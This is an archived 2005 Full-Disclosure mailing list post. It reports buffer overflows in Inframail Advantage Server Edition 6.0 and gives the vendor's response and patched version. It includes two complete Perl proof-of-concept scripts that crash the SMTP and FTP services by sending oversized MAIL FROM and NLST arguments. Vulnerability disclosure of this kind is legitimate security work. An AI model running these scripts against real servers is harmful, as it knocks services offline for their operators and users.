Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-disclosure] Multiple buffer overflows exist in Infradig Systems Inframail Advantage Server Edition 6.0 |
|---|---|
| Date: | Mon, 27 Jun 2005 20:12:14 -0700 |
Summary: Multiple buffer overflows exist in Infradig Systems Inframail Advantage Server Edition 6.0 (http://www.infradig.com/) Details: Input to the SMTP MAIL FROM: command and the FTP NLST command is not properly checked and/or filtered. Issuing the character 'A' roughly 40960 times as an argument to the MAIL FROM: command will cause the ifmail.exe process to die and re-launch. Issuing the character 'A' roughly 102400 times to the NLST command and then issuing the character 'A' roughly 102400 times to the NLST command again will cause all processes running under the ifmailsvc.exe process to die and re-launch (these processes include slapd.exe, slurpd.exe, ifmail.exe, ifweb.exe, etc.). Vulnerable Versions: Infradig Systems Inframail Advantage Server Edition 6.0 (Version: 6.37) Patches/Workarounds: The vendor was notified of the issue. Here is the vendor response: "The current release of Inframail is v7.11 and we have 1) been able to reproduce the SMTP crash, but 2) not the FTP one. The SMTP crash is fixed in the release Inframail v7.12 just out." A patched version of the affected software has been released (Version: 7.12) and is available from http://www.infradig.com/. Exploits: Run the following PERL scripts against the server. The corresponding processes will die and then re-launch. #===== Start Inframail_SMTPOverflow.pl ===== # # Usage: Inframail_SMTPOverflow.pl <ip> # Inframail_SMTPOverflow.pl 127.0.0.1 # # Infradig Systems Inframail Advantage Server Edition 6.0 # (Version: 6.37) # # Download: # http://www.infradig.com/ # ########################################################### use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => "TCP")) { print "Attempting to kill Inframail SMTP server at $ARGV[0]:25..."; sleep(1); print $socket "HELO moto.com\r\n"; sleep(1); print $socket "MAIL FROM:" . "A" x 40960 . "\r\n"; close($socket); } else { print "Cannot connect to $ARGV[0]:25\n"; } #===== End Inframail_SMTPOverflow.pl ===== #===== Start Inframail_FTPOverflow.pl ===== # # Usage: Inframail_FTPOverflow.pl <ip> # Inframail_FTPOverflow.pl 127.0.0.1 # # Infradig Systems Inframail Advantage Server Edition 6.0 # (Version: 6.37) # # Download: # http://www.infradig.com/ # ########################################################### use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Attempting to kill Inframail FTP server at $ARGV[0]:21..."; sleep(1); print $socket "USER hello\r\n"; sleep(1); print $socket "PASS moto\r\n"; sleep(1); print $socket "NLST " . "A" x 102400 . "\r\n"; sleep(1); print $socket "NLST " . "A" x 102400 . "\r\n"; close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } #===== End Inframail_FTPOverflow.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com/tools.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Re: [Full-disclosure] Solaris 9/10 ld.so fun, Przemyslaw Frasunek |
|---|---|
| Next by Date: | [Full-disclosure] [USN-145-1] wget vulnerabilities, Martin Pitt |
| Previous by Thread: | [Full-disclosure] Solaris 9/10 ld.so fun, Przemyslaw Frasunek |
| Next by Thread: | [Full-disclosure] [USN-145-1] wget vulnerabilities, Martin Pitt |
| Indexes: | [Date] [Thread] [Top] [All Lists] |